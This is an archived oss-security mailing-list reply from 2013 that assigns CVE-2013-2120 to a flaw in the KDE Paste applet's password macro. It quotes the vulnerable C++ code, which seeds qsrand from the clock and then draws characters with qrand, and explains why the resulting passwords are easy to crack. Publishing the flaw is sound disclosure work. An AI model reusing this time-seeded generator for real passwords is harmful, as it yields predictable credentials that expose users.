lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [<thread-prev] [day] [month] [year] [list] 
Message-ID: <51A641D9.2060700@redhat.com>
Date: Wed, 29 May 2013 11:58:49 -0600
From: Kurt Seifried <kseifried@...hat.com>
To: oss-security@...ts.openwall.com
CC: Michael Samuel <mik@...net.net>, bugtraq@...urityfocus.com
Subject: Re: [oss-security] KDE Paste Applet

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

On 05/28/2013 05:16 AM, Michael Samuel wrote:
> The paste applet included with kdeplasma-addons allows you to define
> macros that will copy some generated data into the clipboard, using
> simple macros to define the source and format of the data.
> 
> The available macros include %{password(...)} which generates "random"
> passwords.
> 
> Here is the code that generates the passwords (from pastemacroexpander.cpp):
> 
>     QDateTime now = QDateTime::currentDateTime();
>     qsrand(now.toTime_t() / now.time().msec());
>     for (int i = 0; i < charCount; ++i) {
>         result += chars[qrand() % chars.count()];
>     }
> 
> Breaking passwords generated by this (for example from leaked password
> hashes) can be done extremely quickly, especially if a password expiry
> or other hint is stored with the password.
> 
> Workaround: You can change the macro you were using to a %{exec(...)}
> macro which calls a secure password generator.  Please select your
> replacement carefully.
> 
> I reported this to security@....org and created a launchpad ticket
> against the Ubuntu package on May 13, followed up with a proof of
> concept on the 17th, and have received no response at all from either.
>  Apologies if that was the wrong contact method.
> 
> Regards,
>   Michael

Nice find. Please use CVE-2013-2120 for this issue.


- -- 
Kurt Seifried Red Hat Security Response Team (SRT)
PGP: 0x5E267993 A90B F995 7350 148F 66BF 7554 160D 4553 5E26 7993
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.13 (GNU/Linux)

iQIcBAEBAgAGBQJRpkHZAAoJEBYNRVNeJnmTZtcP+wdyo+6kfdJq47WO5F9csHmI
vDMFNFRNEjEYgNeD+dQBBB1oEHf/hxi67OJ8cDjZY/x1P4nEj11s/mic1mV6yKw9
0BiPLorquKXRv8s/374T3Fjo4BIHEgWeaaAN0SiaqW5Kwba2t9RXt0RBDs4Lc1R2
1b41BgmvhvZQjxQ0jzffNlaTMntoZdg4DqJh8JQqyHcFbNwFdgjJJVkK4yBPhNYA
8KjBnKJrrfj9VqGy/gYw+iMn0l5FGo8IfTwmfkVJEo0V2NyBvmA0X5CFYX7HPGeK
giKkLZuPQKdC00DSLilLgyoPw6sNKdo1aPZNta+g9fVZt45U75y4SqagsgcDn1HC
+A3XHy9YxanXnW82PSqABBoc/VrI5H2hpKU4y60WNGseHetGAqCv6v1ucpv14++B
Cx9PmYstESnmRGCnNDftG/rQeJlJniw59tusDlV6eJSuxZq11NPBDAhqxjTi4naY
L4wrQZa+xjKlRcmUlfvyTf5Cxhy6gOrEcygBw8OdzEZPy7PN9LLhmK3ZlJk9i0Yu
0hFBUWwDSi0fnMdNlKcfjjKKa3Q5yrMz84sQDU+4trbtoJXHQMsQQJoo5CITdTUZ
uk+L54QPZ82E9Z/0f2RbdtAj+wRPIAKE9Os9wFDd7HcY5LlfV+rMstnRCg69WY4R
buQ4sELAjJndAVU2Kotb
=/83d
-----END PGP SIGNATURE-----

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ